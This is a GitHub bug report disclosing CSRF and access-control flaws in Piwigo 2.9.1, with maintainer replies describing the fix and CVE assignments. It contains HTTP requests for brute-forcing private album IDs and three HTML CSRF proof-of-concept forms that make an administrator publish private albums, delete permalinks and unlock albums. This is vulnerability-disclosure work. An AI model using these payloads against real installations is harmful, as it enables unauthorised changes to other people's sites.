Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Bug Report: Set administrator private album to public via CSRF & Incorrect Permissions #721

Closed
Akityo opened this issue Jun 28, 2017 · 2 comments

Comments

@Akityo
Copy link

commented Jun 28, 2017

Proof-of-Concept

Version :2.9.1

Incorrect Permissions in album ID

The public / private tags
private means that administrator don’t want others know about album.
But there is some way to know what album his hiding.
And what the private album’s permalinks is.

  1. By creating album , you could know that album id is in rule
  2. So you can brute-force the album id
GET /piwigo/index.php?/category/757 HTTP/1.1
Host: www.test.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Referer: http://www.test.com/piwigo/index.php?/category/c1c12
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: pwg_display_thumbnail=display_thumbnail_classic; pwg_id=513v9ik9uahikec64vu4api2o5
Connection: close

image

- [√] Response with status 200 means that this album is accessible

image

- [√] Response with status 301 means that you don’t have the privilege to access.

Base on the brute-force result.
You can know the hidden album id

If the hidden album has set permalinks.
By request the album id ,permalinks is in the Response packet.
image

Now is time to republic it.

Cross-Site Request Forgery in page permalinks & status, visible, comments in page cat_options.

There is no pwg_token in the request.

So

  1. set private albums to public
<html>
  <!-- CSRF PoC - generated by Akityo -->
  <body>
    <form action="http://www.test.com/piwigo/admin.php?page=cat_options&section=status" method="POST">
      <input type="hidden" name="cat&#95;false&#91;&#93;" value="757" />
      <input type="hidden" name="trueify" value="�&#171;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

  1. Permalink delete
<html>
  <!-- CSRF PoC - generated by Akityo -->
  <body>
    <form action="http://www.test.com/piwigo/admin.php">
      <input type="hidden" name="page" value="permalinks" />
      <input type="hidden" name="delete&#95;permanent" value="fffffff" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  1. unlock albums
<html>
  <!-- CSRF PoC - generated by Akityo -->
  <body>
    <form action="http://www.test.com/piwigo/admin.php?page=cat_options&section=visible" method="POST">
      <input type="hidden" name="cat&#95;false&#91;&#93;" value="756" />
      <input type="hidden" name="trueify" value="�&#171;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Original packet

POST /piwigo/admin.php?page=cat_options&section=status HTTP/1.1
Host: www.test.com
Content-Length: 34
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.test.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.test.com/piwigo/admin.php?page=cat_options
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: pwg_display_thumbnail=display_thumbnail_classic; pwg_id=513v9ik9uahikec64vu4api2o5
Connection: close

cat_false%5B%5D=758&trueify=%C2%AB

Refences: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

Discover By: topsec(Li Zhiqiang)

@flop25 flop25 self-assigned this Jun 28, 2017

flop25 referenced this issue Jun 28, 2017
adding pwg_token on permalink & cat_options
and therefor solving issue:721
@flop25

This comment has been minimized.

Copy link
Member

commented Jun 28, 2017

Thank you for reporting
I've added the pwg_token
I open another one about the permalink answered when requesting an private id

@fgeek

This comment has been minimized.

Copy link

commented Jul 1, 2017

CVE-2017-10678, CVE-2017-10679, CVE-2017-10680 and CVE-2017-10681 and has been assigned for these issues.

plegall added a commit that referenced this issue Jul 3, 2017
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
3 participants
You can’t perform that action at this time.